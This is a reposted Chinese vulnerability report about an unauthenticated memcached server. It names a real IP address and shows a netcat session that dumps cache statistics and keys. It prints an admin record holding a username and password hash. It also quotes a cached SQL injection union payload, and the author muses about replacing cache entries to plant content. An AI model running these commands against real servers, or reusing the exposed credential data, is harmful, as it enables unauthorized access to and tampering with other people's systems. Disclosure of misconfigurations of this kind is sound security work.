专栏首页逸鹏说道memcached未作IP限制导致缓存数据可被攻击者控制

memcached未作IP限制导致缓存数据可被攻击者控制

漏洞证明:

C:\>nc -vv 61.135.178.118 11211 61.135.178.118: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [61.135.178.118] 11211 (?) open stats items STAT items:4:number 1544729 STAT items:4:age 4772005 STAT items:5:number 101088 STAT items:5:age 18142497 STAT items:6:number 729610 STAT items:6:age 1410176 STAT items:7:number 1019924 STAT items:7:age 2873336 STAT items:8:number 1458432 STAT items:8:age 1503000 STAT items:9:number 155117 STAT items:9:age 600906 STAT items:10:number 159866 STAT items:10:age 1730665 STAT items:11:number 12428 STAT items:11:age 902232 STAT items:12:number 762 STAT items:12:age 7623799 END stats cachedump 12 10 ITEM 176174226#me [1020 b; 1249516659 s] ITEM 173853058#me [1053 b; 1249516659 s] ITEM 184790733#me [1031 b; 1249516659 s] ITEM 184189728#me [1047 b; 1249516659 s] ITEM 184067484#me [1050 b; 1249516659 s] ITEM 179228126#me [1043 b; 1249516659 s] ITEM 180014248#me [1018 b; 1249516659 s] ITEM 184112063#me [1024 b; 1249516659 s] ITEM 171451939#me [1026 b; 1249516659 s] ITEM 154896159#me [1038 b; 1249516659 s] END 这是某博客的cache

浏览了一下得到的URL,确定是那个cache取到的数据。如果我replace一下,能不能挂点东西? update: 扫描了3个C类,发现了更多有意思的东西,如passport之类: get admin_user_admin VALUE admin_user_admin 1 207 a:8:{s:3:"uid";s:1:"1";s:8:"username";s:5:"admin";s:6:"passwd";s:32:"da2100201af e5c13dcdbb197b65f8bab";s:7:"regdate";s:1:"0";s:7:"logdate";s:1:"0";s:5:"logip";s :0:"";s:5:"intro";s:0:"";s:5:"level";s:2:"99";} 还有cache的被人注入的SQL语句,ITEM adidas_time_date_product_day_clickcount_1299_and_1=2_union_select_1,user(), version(),4,5,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33 [1 b; 1261980551 s],嘿嘿。

本文分享自微信公众号 - 我为Net狂(dotNetCrazy)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2015-10-06

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Memcached反射放大DDoS攻击威胁分析

    2018年2月27日,多国CERT和多家网络和云运营商报告称,恶意攻击者正在使用不安全配置的Memcached服务器来借力放大DDoS攻击。 根据报告,Memc...

    安恒信息
  • Memcached反射放大DDoS漏洞怎么办?

    安恒信息
  • memcached安装及.NET中的Memcached.ClientLibrary使用详解

    序言 吹吹牛逼先,借我你的20分钟,保证你在.net中使用memcached缓存数据,畅通无阻,提升数据读取效率,分担数据库压力,便不在话下。 本篇主要说下:m...

    逸鹏
  • Windows 64位下安装Redis超详细教程

    Redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(...

    zhisheng
  • Mysql 8.0 新增特性

    1. 数据字典 新增了事务型的数据字典,用来存储数据库对象信息 之前,字典数据是存储在元数据文件和非事务型表中的 2. 账号权限管理 添加了对 “角色” 的支持...

    dys
  • 缓存 | redis和memecache的异同以及应用场景

    缓存就是数据交换的缓冲区Cache。当某一硬件要读取数据时,会首先从缓存中查找需要的数据,如果找到了则直接执行,找不到的话则从内存中找。由于缓存的运行速度比内存...

    码神联盟
  • 用aop加redis实现通用接口缓存

    系统在高并发场景下,最有用的三个方法是缓存,限流,降级。 缓存就是其中之一,目前缓存基本上是用redis或者memcached。 redis和memcached...

    猿天地
  • Memcached 命令执行漏洞(CVE-2016-8704、CVE-2016-8705、CVE-2016-8706)简析

    Author: p0wd3r, dawu (知道创宇404安全实验室) Date: 2016-11-01 0x00 漏洞概述 1.漏洞简介 Memcached...

    Seebug漏洞平台
  • 圆通wap分站memcache没做ip限制

    漏洞证明: 获取memcache的信息,敏感的是version而已 获取item 获取key 然后其实是可以查询到数据的,用get <key>就行,可是我这里木...

    逸鹏

扫码关注云+社区

领取腾讯云代金券